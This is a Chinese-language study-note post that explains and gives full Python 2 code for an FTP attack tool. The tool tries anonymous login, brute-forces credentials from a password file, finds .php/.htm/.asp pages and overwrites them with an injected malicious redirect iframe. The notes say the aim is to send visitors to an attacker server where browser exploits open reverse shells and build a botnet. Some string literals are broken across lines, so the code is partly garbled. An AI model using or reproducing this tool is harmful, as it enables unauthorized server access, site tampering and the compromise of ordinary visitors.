笔记整理2——python实现ftp口令爆破

一.主要思路：

(1).匿名登陆模块:
def anonLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login('anonymous', 'me@your.com')
有的ftp服务器开启了匿名登录服务，则可以使用该账号密码进行登陆
user:'anonymous',
password: 'me@your.com'

(2).密码和口令爆破模块
def bruteLogin(hostname, passwdFile):
    pF = open(passwdFile, 'r')
    for line in pF.readlines():
        ''''''
        ''''''
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(userName, passWord)
可以通过收集的字典进行爆破

(3).查找默认页面
登陆上ftp服务后，客户以通过ftp.nlst()方法查找所有文件的名字，
遍历找寻index.htm，index.asp等文件。
def returnDefault(ftp):
    try:
        dirList = ftp.nlst()
找到后返回其文件名列表

(4).注入恶意代码
通过找到的文件名将其文件下载下来，注入重定向代码，使访问该服务器的
用户都重定向到我们的攻击机上的index页面，从而对浏览器发动攻击
def injectPage(ftp, page, redirect):
    f = open(page + '.tmp', 'w')
    ftp.retrlines('RETR ' + page, f.write)
    print '[+] Downloaded Page: ' + page
''''''''''
(5).整合全部的攻击，写成一个函数
登录，遍历文件，上传覆盖，完成对目标服务器的攻击。
难点在与登录成功。(验证了信息收集的重要性)
def attack(username,password,tgtHost,redirect):
    ftp = ftplib.FTP(tgtHost)
    ftp.login(username, password)
    defPages = returnDefault(ftp)
注意的是返回的index因该不止一个。

(6).关于连接肉机的说明
这部分攻击是有我们已获得的恶意服务器进行对用户浏览器的攻击，
主要通过浏览器的漏洞利用代码，当用户访问该服务器时，用户浏览器
会被注入恶意代码，从而向恶意服务器建立一个反向的shell。获得批量肉机。

具体实现尚未学习，可用metasploit框架中的漏洞利用代码。参考攻击
谷歌的极光行动。

3.主要利用模块
import ftplib
import optparse
import time

4.主要利用函数
def anonLogin(hostname):
def bruteLogin(hostname, passwdFile):
def returnDefault(ftp):
def injectPage(ftp, page, redirect):
def attack(username,password,tgtHost,redirect):

5.复习收获与总结
(1).端口映射的内容
https://baike.baidu.com/item/%E7%AB%AF%E5%8F%A3%E6%98%A0%E5%B0%84/98247?fr=aladdin

二.代码

#!/usr/bin/python
# -*- coding: utf-8 -*-
import ftplib
import optparse
import time


def anonLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login('anonymous', 'me@your.com')
        print '
[*] ' + str(hostname) 
            + ' FTP Anonymous Logon Succeeded.'
        ftp.quit()
        return True
    except Exception, e:
        print '
[-] ' + str(hostname) +
          ' FTP Anonymous Logon Failed.'
        return False


def bruteLogin(hostname, passwdFile):
    pF = open(passwdFile, 'r')
    for line in pF.readlines():
        time.sleep(1)
        userName = line.split(':')[0]
        passWord = line.split(':')[1].strip('
').strip('
')
        print '[+] Trying: ' + userName + '/' + passWord
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(userName, passWord)
            print '
[*] ' + str(hostname) +
              ' FTP Logon Succeeded: '+userName+'/'+passWord
            ftp.quit()
            return (userName, passWord)
        except Exception, e:
            pass
    print '
[-] Could not brute force FTP credentials.'
    return (None, None)


def returnDefault(ftp):
    try:
        dirList = ftp.nlst()
    except:
        dirList = []
        print '[-] Could not list directory contents.'
        print '[-] Skipping To Next Target.'
        return

    retList = []
    for fileName in dirList:
        fn = fileName.lower()
        if '.php' in fn or '.htm' in fn or '.asp' in fn:
            print '[+] Found default page: ' + fileName
        retList.append(fileName)
    return retList


def injectPage(ftp, page, redirect):
    f = open(page + '.tmp', 'w')
    ftp.retrlines('RETR ' + page, f.write)
    print '[+] Downloaded Page: ' + page

    f.write(redirect)
    f.close()
    print '[+] Injected Malicious IFrame on: ' + page

    ftp.storlines('STOR ' + page, open(page + '.tmp'))
    print '[+] Uploaded Injected Page: ' + page


def attack(username,password,tgtHost,redirect):
    ftp = ftplib.FTP(tgtHost)
    ftp.login(username, password)
    defPages = returnDefault(ftp)
    for defPage in defPages:
        injectPage(ftp, defPage, redirect)


def main():
    parser = optparse.OptionParser('usage %prog '+
      '-H <target host[s]> -r <redirect page>'+
      '[-f <userpass file>]')
    
    parser.add_option('-H', dest='tgtHosts',
      type='string', help='specify target host')
    parser.add_option('-f', dest='passwdFile',
      type='string', help='specify user/password file')
    parser.add_option('-r', dest='redirect',
      type='string',help='specify a redirection page')

    (options, args) = parser.parse_args()
    tgtHosts = str(options.tgtHosts).split(',')
    passwdFile = options.passwdFile
    redirect = options.redirect

    if tgtHosts == None or redirect == None:
        print parser.usage
        exit(0)

    for tgtHost in tgtHosts:
        username = None
        password = None

        if anonLogin(tgtHost) == True:
            username = 'anonymous'
            password = 'me@your.com'
            print '[+] Using Anonymous Creds to attack'
            attack(username, password, tgtHost, redirect)
      
        elif passwdFile != None:
            (username, password) =
              bruteLogin(tgtHost, passwdFile)
            if password != None:
                '[+] Using Creds: ' +
                  username + '/' + password + ' to attack'
                attack(username, password, tgtHost, redirect)

if __name__ == '__main__':
    main()